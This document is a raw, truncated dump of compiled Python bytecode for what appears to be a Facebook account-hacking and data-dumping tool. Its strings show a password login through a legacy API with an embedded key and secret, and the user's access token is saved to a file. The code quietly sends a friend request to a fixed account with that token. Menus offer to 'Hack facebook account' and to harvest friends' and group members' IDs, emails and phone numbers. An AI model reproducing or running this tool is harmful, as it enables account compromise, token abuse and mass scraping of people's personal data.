inputt\x01\x00\x00\x001t\x01\x00\x00\x002t\x01\x00\x00\x000(\x07\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R\x08\x00\x00\x00R2\x00\x00\x00t\x06\x00\x00\x00tokenz(\x01\x00\x00\x00t\x04\x00\x00\x00msuk(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x05\x00\x00\x00masuk\x8c\x00\x00\x00s$\x00\x00\x00\x00\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\x0b\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xb7\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x1a\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00}\x00\x00t\x03\x00\x83\x00\x00\x01Wn\x89\x02\x04t\x04\x00t\x05\x00f\x02\x00k\n\x00r\xb2\x02\x01\x01\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x06\x00GHt\x07\x00d\x04\x00\x83\x01\x00}\x01\x00t\x08\x00j\x08\x00d\x05\x00\x83\x01\x00}\x02\x00t\t\x00\x83\x00\x00\x01y\x11\x00t\n\x00j\x02\x00d\x06\x00\x83\x01\x00\x01Wn \x00\x04t\x0b\x00j\x0c\x00k\n\x00r\xa4\x00\x01\x01\x01d\x07\x00GHt\r\x00\x83\x00\x00\x01n\x01\x00Xt\x0e\x00t\n\x00j\x0f\x00_\x10\x00t\n\x00j\x11\x00d\x08\x00d\t\x00\x83\x00\x01\x01|\x01\x00t\n\x00j\x12\x00d\n\x00<|\x02\x00t\n\x00j\x12\x00d\x0b\x00<t\n\x00j\x13\x00\x83\x00\x00\x01t\n\x00j\x14\x00\x83\x00\x00}\x03\x00d\x0c\x00|\x03\x00k\x06\x00rT\x02y.\x01d\r\x00|\x01\x00\x17d\x0e\x00\x17|\x02\x00\x17d\x0f\x00\x17}\x04\x00i\x0b\x00d\x10\x00d\x11\x006d\x12\x00d\x13\x006|\x01\x00d\n\x006d\x14\x00d\x15\x006d\x16\x00d\x17\x006d\x16\x00d\x18\x006d\x19\x00d\x1a\x006d\x1b\x00d\x1c\x006|\x02\x00d\x12\x006d\x1d\x00d\x1e\x006d\x1f\x00d \x006}\x05\x00t\x15\x00j\x16\x00d!\x00\x83\x01\x00}\x06\x00|\x06\x00j\x17\x00|\x04\x00\x83\x01\x00\x01|\x06\x00j\x18\x00\x83\x00\x00}\x07\x00|\x05\x00j\x17\x00i\x01\x00|\x07\x00d"\x006\x83\x01\x00\x01d#\x00}\x03\x00t\x19\x00j\x1a\x00|\x03\x00d$\x00|\x05\x00\x83\x01\x01}\x08\x00t\x1b\x00j\x1c\x00|\x08\x00j\x1d\x00\x83\x01\x00}\t\x00t\x02\x00d\x02\x00d%\x00\x83\x02\x00}\n\x00|\n\x00j\x1e\x00|\t\x00d&\x00\x19\x83\x01\x00\x01|\n\x00j\x1f\x00\x83\x00\x00\x01d\'\x00GHt\x19\x00j \x00d(\x00|\t\x00d&\x00\x19\x17\x83\x01\x00\x01t\x00\x00j\x01\x00d)\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01WqT\x02\x04t\x19\x00j!\x00j"\x00k\n\x00rP\x02\x01\x01\x01d\x07\x00GHt\r\x00\x83\x00\x00\x01qT\x02Xn\x00\x00d*\x00|\x03\x00k\x06\x00r\x89\x02d+\x00GHt\x00\x00j\x01\x00d,\x00\x83\x01\x00\x01t#\x00j$\x00d-\x00\x83\x01\x00\x01t\r\x00\x83\x00\x00\x01q\xb3\x02d.\x00GHt\x00\x00j\x01\x00d,\x00\x83\x01\x00\x01t#\x00j$\x00d-\x00\x83\x01\x00\x01t%\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(/\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s@\x00\x00\x00\x1b[1;91m[+] \x1b[1;36mID\x1b[1;97m|\x1b[1;96mEmail\x1b[1;97m \x1b[1;91m:\x1b[1;92m s+\x00\x00\x00\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m s\x16\x00\x00\x00https://m.facebook.coms\x19\x00\x00\x00\n\x1b[1;91m[!] No connectiont\x02\x00\x00\x00nri\x00\x00\x00\x00t\x05\x00\x00\x00emailt\x04\x00\x00\x00passs\x0b\x00\x00\x00save-devicesG\x00\x00\x00api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=s`\x00\x00\x00format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=s;\x00\x00\x00return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32t \x00\x00\x00882a8490361da98702bf97a021ddc14dt\x07\x00\x00\x00api_keyt\x08\x00\x00\x00passwordt\x10\x00\x00\x00credentials_typet\x04\x00\x00\x00JSONt\x06\x00\x00\x00formatR8\x00\x00\x00t\x13\x00\x00\x00generate_machine_idt\x18\x00\x00\x00generate_session_cookiest\x05\x00\x00\x00en_USt\x06\x00\x00\x00locales\n\x00\x00\x00auth.logint\x06\x00\x00\x00methodR:\x00\x00\x00t\x14\x00\x00\x00return_ssl_resourcess\x03\x00\x00\x001.0t\x01\x00\x00\x00vt\x03\x00\x00\x00md5t\x03\x00\x00\x00sigs\'\x00\x00\x00https://api.facebook.com/restserver.phpt\x06\x00\x00\x00paramsR\x11\x00\x00\x00t\x0c\x00\x00\x00access_tokens5\x00\x00\x00\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin successfullysM\x00\x00\x00https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=R\n\x00\x00\x00t\n\x00\x00\x00checkpoints%\x00\x00\x00\n\x1b[1;91m[!] \x1b[1;93mAccount Checkpoints\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s\x18\x00\x00\x00\n\x1b[1;91m[!] Login Failed(&\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R+\x00\x00\x00R,\x00\x00\x00R-\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00t\x07\x00\x00\x00getpassR#\x00\x00\x00t\x02\x00\x00\x00brt\t\x00\x00\x00mechanizet\x08\x00\x00\x00URLErrorR\x08\x00\x00\x00t\x04\x00\x00\x00Truet\x08\x00\x00\x00_factoryt\x07\x00\x00\x00is_htmlt\x0b\x00\x00\x00select_formt\x04\x00\x00\x00formt\x06\x00\x00\x00submitt\x06\x00\x00\x00geturlt\x07\x00\x00\x00hashlibt\x03\x00\x00\x00newt\x06\x00\x00\x00updatet\t\x00\x00\x00hexdigestt\x08\x00\x00\x00requestst\x03\x00\x00\x00gett\x04\x00\x00\x00jsont\x05\x00\x00\x00loadst\x04\x00\x00\x00textR\x19\x00\x00\x00t\x05\x00\x00\x00closet\x04\x00\x00\x00postt\n\x00\x00\x00exceptionsR\x01\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00(\x0b\x00\x00\x00R4\x00\x00\x00t\x02\x00\x00\x00idR6\x00\x00\x00t\x03\x00\x00\x00urlRO\x00\x00\x00t\x04\x00\x00\x00dataR\x10\x00\x00\x00t\x01\x00\x00\x00aR\'\x00\x00\x00R\x1e\x00\x00\x00t\x04\x00\x00\x00zedd(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R2\x00\x00\x00\xa3\x00\x00\x00sf\x00\x00\x00\x00\x01\r\x01\x03\x01\x0f\x01\x0b\x01\x13\x01\r\x01\x05\x01\x0c\x01\x0f\x01\x07\x01\x03\x01\x11\x01\x10\x01\x05\x01\x0b\x01\x0c\x01\x10\x01\r\x01\r\x01\n\x01\x0c\x01\x0c\x01\x03\x01\x16\x01S\x01\x0f\x01\r\x01\x0c\x01\x14\x01\x06\x01\x15\x01\x12\x01\x0f\x01\x11\x01\n\x01\x05\x01\x15\x01\r\x01\x0b\x01\x13\x01\x05\x01\x0e\x01\x0c\x01\x05\x01\r\x01\r\x01\n\x02\x05\x01\r\x01\r\x01c\x00\x00\x00\x00\x06\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xda\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00GHt\x03\x00d\x02\x00\x83\x01\x00}\x00\x00y`\x00t\x04\x00j\x05\x00d\x03\x00|\x00\x00\x17\x83\x01\x00}\x01\x00t\x06\x00j\x07\x00|\x01\x00j\x08\x00\x83\x01\x00}\x02\x00|\x02\x00d\x04\x00\x19}\x03\x00t\t\x00d\x05\x00d\x06\x00\x83\x02\x00}\x04\x00|\x04\x00j\n\x00|\x00\x00\x83\x01\x00\x01|\x04\x00j\x0b\x00\x83\x00\x00\x01t\x0c\x00\x83\x00\x00\x01WnU\x00\x04t\r\x00k\n\x00r\xd5\x00\x01\x01\x01d\x07\x00GHt\x03\x00d\x08\x00\x83\x01\x00}\x05\x00|\x05\x00d\t\x00k\x02\x00r\xb5\x00t\x0e\x00\x83\x00\x00\x01q\xd6\x00|\x05\x00d\n\x00k\x02\x00r\xcb\x00t\x0f\x00\x83\x00\x00\x01q\xd6\x00t\x0e\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x0b\x00\x00\x00NR&\x00\x00\x00s(\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mToken\x1b[1;91m : \x1b[1;97ms+\x00\x00\x00https://graph.facebook.com/me?access_token=R0\x00\x00\x00s\t\x00\x00\x00login.txtR\x11\x00\x00\x00s\x10\x00\x00\x00\x1b[1;91m[!] Wrongs6\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mWant to pick up token?\x1b[1;97m[y/n]: R\n\x00\x00\x00t\x01\x00\x00\x00y(\x10\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R)\x00\x00\x00R\x19\x00\x00\x00Rg\x00\x00\x00R+\x00\x00\x00R,\x00\x00\x00R\x08\x00\x00\x00R2\x00\x00\x00(\x06\x00\x00\x00R4\x00\x00\x00t\x03\x00\x00\x00otwRm\x00\x00\x00t\x04\x00\x00\x00namaRn\x00\x00\x00R\x1f\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R;\x00\x00\x00\xda\x00\x00\x00s&\x00\x00\x00\x00\x01\r\x01\x05\x01\x0c\x01\x03\x01\x13\x01\x12\x01\n\x01\x0f\x01\r\x01\n\x01\x0b\x01\r\x01\x05\x01\x0c\x01\x0c\x01\n\x01\x0c\x01\n\x02c\x00\x00\x00\x00\x05\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00sc\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00WnD\x00\x04t\x04\x00k\n\x00rl\x00\x01\x01\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy=\x00t\x08\x00j\t\x00d\x07\x00|\x00\x00\x17\x83\x01\x00}\x01\x00t\n\x00j\x0b\x00|\x01\x00j\x0c\x00\x83\x01\x00}\x02\x00|\x02\x00d\x08\x00\x19}\x03\x00|\x02\x00d\t\x00\x19}\x04\x00Wnf\x00\x04t\r\x00k\n\x00r\xf0\x00\x01\x01\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01d\n\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n#\x00\x04t\x08\x00j\x0e\x00j\x0f\x00k\n\x00r\x12\x01\x01\x01\x01d\x0b\x00GHt\x10\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x11\x00GHd\x0c\x00|\x03\x00\x17d\r\x00\x17GHd\x0e\x00d\x0f\x00d\x10\x00\x14\x17GHd\x11\x00GHd\x12\x00GHd\x13\x00GHd\x14\x00GHd\x15\x00GHt\x12\x00\x83\x00\x00\x01d\x00\x00S(\x16\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s+\x00\x00\x00https://graph.facebook.com/me?access_token=R0\x00\x00\x00Rj\x00\x00\x00s$\x00\x00\x00\x1b[1;91m[!] \x1b[1;93mAccount Checkpoints\x18\x00\x00\x00\x1b[1;91m[!] No connections:\x00\x00\x00\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92ms\x07\x00\x00\x00\x1b[1;97ms\n\x00\x00\x00\x1b[1;97m\xe2\x95\x9ai(\x00\x00\x00s\x03\x00\x00\x00\xe2\x95\x90s\x14\x00\x00\x001]. User informations(\x00\x00\x002]. Hack facebook account s\x19\x00\x00\x003]. Show token s\x16\x00\x00\x004]. LogOut s\x1f\x00\x00\x005]. Exit the programs (\x13\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00R.\x00\x00\x00t\x05\x00\x00\x00pilih(\x05\x00\x00\x00R4\x00\x00\x00Rp\x00\x00\x00Rm\x00\x00\x00Rq\x00\x00\x00Rj\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R+\x00\x00\x00\xf1\x00\x00\x00sB\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x13\x01\x12\x01\n\x01\x0e\x01\r\x01\r\x01\x05\x01\r\x01\r\x01\n\x01\x13\x01\x05\x01\x0b\x01\r\x01\x05\x01\r\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00s\xf9\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\xce\x00|\x00\x00d\x04\x00k\x02\x00r=\x00t\x02\x00\x83\x00\x00\x01n\xb8\x00|\x00\x00d\x05\x00k\x02\x00rS\x00t\x03\x00\x83\x00\x00\x01n\xa2\x00|\x00\x00d\x06\x00k\x02\x00r\xa3\x00t\x04\x00j\x05\x00d\x07\x00\x83\x01\x00\x01t\x06\x00GHt\x07\x00d\x08\x00d\t\x00\x83\x02\x00j\x08\x00\x83\x00\x00}\x01\x00d\n\x00|\x01\x00\x17GHt\x00\x00d\x0b\x00\x83\x01\x00\x01t\t\x00\x83\x00\x00\x01nR\x00|\x00\x00d\x0c\x00k\x02\x00r\xd3\x00t\x04\x00j\x05\x00d\r\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x0e\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01n"\x00|\x00\x00d\x0f\x00k\x02\x00r\xe9\x00t\n\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\x10\x00\x00\x00Ns\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[!] Wrong inputR8\x00\x00\x00R9\x00\x00\x00t\x01\x00\x00\x003R&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s-\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mYour token\x1b[1;91m :\x1b[1;97m s\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]t\x01\x00\x00\x004s\x10\x00\x00\x00rm -rf login.txtsA\x00\x00\x00xdg-open https://www.youtube.com/channel/UCbZ45S0QGbo5IAaItt-mBlAR:\x00\x00\x00(\x0b\x00\x00\x00R/\x00\x00\x00Rr\x00\x00\x00t\t\x00\x00\x00informasit\t\x00\x00\x00menu_hackR\x05\x00\x00\x00R(\x00\x00\x00R.\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R+\x00\x00\x00R\x08\x00\x00\x00(\x02\x00\x00\x00Rn\x00\x00\x00R4\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>Rr\x00\x00\x00\x14\x01\x00\x00s.\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\r\x01\x05\x01\x15\x01\t\x01\n\x01\n\x01\x0c\x01\r\x01\r\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\x08\x00\x00\x00\x07\x00\x00\x00C\x00\x00\x00s\xaa\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHt\t\x00d\x07\x00\x83\x01\x00}\x01\x00t\n\x00d\x08\x00\x83\x01\x00\x01t\x0b\x00j\x0c\x00d\t\x00|\x00\x00\x17\x83\x01\x00}\x02\x00t\r\x00j\x0e\x00|\x02\x00j\x0f\x00\x83\x01\x00}\x03\x00x\xf6\x01|\x03\x00d\n\x00\x19D]\xd4\x01}\x04\x00|\x01\x00|\x04\x00d\x0b\x00\x19k\x06\x00s\xde\x00|\x01\x00|\x04\x00d\x0c\x00\x19k\x06\x00r\xb8\x00t\x0b\x00j\x0c\x00d\r\x00|\x04\x00d\x0c\x00\x19\x17d\x0e\x00\x17|\x00\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x0e\x00|\x05\x00j\x0f\x00\x83\x01\x00}\x06\x00d\x0f\x00d\x10\x00\x14GHy\x11\x00d\x11\x00|\x06\x00d\x0b\x00\x19\x17GHWn\x16\x00\x04t\x10\x00k\n\x00rA\x01\x01\x01\x01d\x12\x00GHn\x01\x00Xy\x11\x00d\x13\x00|\x06\x00d\x0c\x00\x19\x17GHWn\x16\x00\x04t\x10\x00k\n\x00rk\x01\x01\x01\x01d\x14\x00GHn\x01\x00Xy\x11\x00d\x15\x00|\x06\x00d\x16\x00\x19\x17GHWn\x16\x00\x04t\x10\x00k\n\x00r\x95\x01\x01\x01\x01d\x17\x00GHn\x01\x00Xy\x11\x00d\x18\x00|\x06\x00d\x19\x00\x19\x17GHWn\x16\x00\x04t\x10\x00k\n\x00r\xbf\x01\x01\x01\x01d\x1a\x00GHn\x01\x00Xy\x15\x00d\x1b\x00|\x06\x00d\x1c\x00\x19d\x0b\x00\x19\x17GHWn\x16\x00\x04t\x10\x00k\n\x00r\xed\x01\x01\x01\x01d\x1d\x00GHn\x01\x00Xy\x11\x00d\x1e\x00|\x06\x00d\x1f\x00\x19\x17GHWn\x16\x00\x04t\x10\x00k\n\x00r\x17\x02\x01\x01\x01d \x00GHn\x01\x00XyL\x00d!\x00GHx@\x00|\x06\x00d"\x00\x19D]4\x00}\x07\x00y\x15\x00d#\x00|\x07\x00d$\x00\x19d\x0b\x00\x19\x17GHWq+\x02\x04t\x10\x00k\n\x00r^\x02\x01\x01\x01d%\x00GHq+\x02Xq+\x02WWn\x11\x00\x04t\x10\x00k\n\x00rw\x02\x01\x01\x01n\x01\x00Xt\t\x00d&\x00\x83\x01\x00\x01t\x11\x00\x83\x00\x00\x01q\xb8\x00q\xb8\x00Wd\'\x00GHt\t\x00d&\x00\x83\x01\x00\x01t\x11\x00\x83\x00\x00\x01d\x00\x00S((\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s>\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mEnter ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97ms,\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...s3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=Rl\x00\x00\x00R0\x00\x00\x00Rj\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s+\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : s9\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mName\x1b[1;97m : \x1b[1;91mNot founds+\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : s9\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mNot founds+\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : R?\x00\x00\x00s9\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mNot founds+\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mTelephone\x1b[1;97m : t\x0c\x00\x00\x00mobile_phones9\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mTelephone\x1b[1;97m : \x1b[1;91mNot founds+\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLocation\x1b[1;97m : t\x08\x00\x00\x00locations9\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mLocation\x1b[1;97m : \x1b[1;91mNot founds+\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mDate of birth\x1b[1;97m : t\x08\x00\x00\x00birthdays9\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mDate of birth\x1b[1;97m : \x1b[1;91mNot founds+\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSchool\x1b[1;97m : t\t\x00\x00\x00educations#\x00\x00\x00\x1b[1;91m ~ \x1b[1;97mt\x06\x00\x00\x00schools,\x00\x00\x00\x1b[1;91m ~ \x1b[1;91mNot founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x1b\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] User not found(\x12\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R \x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R+\x00\x00\x00(\x08\x00\x00\x00R4\x00\x00\x00t\x03\x00\x00\x00aidR\'\x00\x00\x00t\x03\x00\x00\x00cokR\x13\x00\x00\x00R\x10\x00\x00\x00R\x1e\x00\x00\x00t\x01\x00\x00\x00q(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>Ru\x00\x00\x00/\x01\x00\x00st\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x0c\x01\n\x01\x13\x01\x12\x01\x11\x01 \x01\x1f\x01\x12\x01\t\x01\x03\x01\x11\x01\r\x00\t\x01\x03\x01\x11\x01\r\x00\t\x01\x03\x01\x11\x01\r\x00\t\x01\x03\x01\x11\x01\r\x00\t\x01\x03\x01\x15\x01\r\x00\t\x01\x03\x01\x11\x01\r\x00\t\x01\x03\x01\x05\x01\x11\x01\x03\x01\x15\x01\r\x00\x11\x01\r\x00\x04\x01\n\x01\n\x02\x04\x02\x05\x01\n\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xb9\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHd\x0c\x00GHd\r\x00GHd\x0e\x00GHd\x0f\x00GHd\x10\x00GHd\x11\x00GHd\x12\x00GHt\t\x00\x83\x00\x00\x01d\x00\x00S(\x13\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s3\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m1.\x1b[1;97m Get ID friends?\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m2.\x1b[1;97m Get ID friend from friends3\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m3.\x1b[1;97m Get ID Searchs9\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m4.\x1b[1;97m Get group member IDs<\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m5.\x1b[1;97m Get group member emailsC\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m6.\x1b[1;97m Get group member phone numbers6\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m7.\x1b[1;97m Get email friendsB\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m8.\x1b[1;97m Get email friend from friendsA\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m9.\x1b[1;97m Get a friend\'s phone numbersN\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m10.\x1b[1;97m Get a friend\'s phone number from friends*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;91m0.\x1b[1;97m Backs\x03\x00\x00\x00\xe2\x95\x91(\n\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00t\n\x00\x00\x00dump_pilih(\x01\x00\x00\x00R4\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x04\x00\x00\x00dumpf\x01\x00\x00s.\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s;\x01\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\x10\x01|\x00\x00d\x04\x00k\x02\x00r=\x00t\x02\x00\x83\x00\x00\x01n\xfa\x00|\x00\x00d\x05\x00k\x02\x00rS\x00t\x03\x00\x83\x00\x00\x01n\xe4\x00|\x00\x00d\x06\x00k\x02\x00r{\x00t\x04\x00j\x05\x00d\x07\x00\x83\x01\x00\x01d\x08\x00GHt\x06\x00\x83\x00\x00\x01n\xbc\x00|\x00\x00d\t\x00k\x02\x00r\x91\x00t\x07\x00\x83\x00\x00\x01n\xa6\x00|\x00\x00d\n\x00k\x02\x00r\xa7\x00t\x08\x00\x83\x00\x00\x01n\x90\x00|\x00\x00d\x0b\x00k\x02\x00r\xbd\x00t\t\x00\x83\x00\x00\x01nz\x00|\x00\x00d\x0c\x00k\x02\x00r\xd3\x00t